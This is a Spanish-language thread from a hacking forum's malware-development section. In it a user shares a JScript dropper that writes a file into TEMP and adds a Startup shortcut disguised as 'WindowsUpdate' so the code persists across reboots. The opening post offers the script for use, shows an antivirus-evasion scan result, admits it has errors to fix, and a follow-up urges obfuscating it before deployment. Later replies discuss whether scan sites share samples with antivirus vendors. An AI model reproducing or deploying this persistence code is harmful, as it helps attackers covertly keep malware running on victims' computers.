Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

[In]Seguridad Informática => Análisis y desarrollo de malwares => Mensaje iniciado por: arduo en Mayo 25, 2022, 04:13:04 PM

Título: Javascript file drop and startup
Publicado por: arduo en Mayo 25, 2022, 04:13:04 PM
Hola buenas chaval@s.

Bueno me presento soy arduo, en udtools q en paz descanse, y en indetectables tenia otro nick, bueno siempre fui modder, aunq nunca tuve ese rango, me gusta modificar las cosas, y hoy os voy a dejar un script en javascript que modifique hace 2 años, nunca lo publique en ningun lado, basicamente cogi codigo de diferentes scripts y cree ese, esto lo q hace es crear un archivo.js en TEMP y un archivo.lnk en STARTUP, añadirle persistencia hablando en plata. A dia de hoy este es el scan.

(https://antiscan.me/images/result/IA3FxqcFEwuF.png)

Aviso que tiene mas de un error, corregirlo... Los errores son muy simples, si posteo mas cosas se iran agrandando xD
https://github.com/arduo93/JsFileDropAndStartup
Código [Seleccionar]
var strr = new ActiveXObject("Scripting.FileSystemObject")
var strtwo = WScript.CreateObject("WScript.Shell");
var temp = strtwo.ExpandEnvironmentStrings("TEMP");

var strtres = strr.CreateTextFile(temp +"WindowsUpdate.js", true);
strtres.WriteLine("Ur js code");
strtres.Close();

strcinco = strtwo.SpecialFolders("Startup");
var strcuatro = strtwo.CreateShortcut(strcinco + "WindowsUpdate.lnk");
strcuatro.TargetPath = WScript.ScriptFullName;
strcuatro.Description = "Shortcut WindowsUpdate"
strcuatro.WorkingDirectory = temp +"/WindowsUpdate.js";
strcuatro.Save();
Título: Re: Javascript file drop and startup
Publicado por: arduo en Mayo 25, 2022, 04:15:19 PM
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.
Título: Re: Javascript file drop and startup
Publicado por: underzero en Junio 05, 2022, 03:36:21 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.

¿La web antiscan.me comparte muestras con las compañias de AV?
Título: Re: Javascript file drop and startup
Publicado por: AXCESS en Junio 05, 2022, 04:47:44 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¿La web antiscan.me comparte muestras con las compañias de AV?


Es común la retroalimentación y convenios entre estos tipos de sitios y las compañías de AV.
Sólo texto | Texto con Imágenes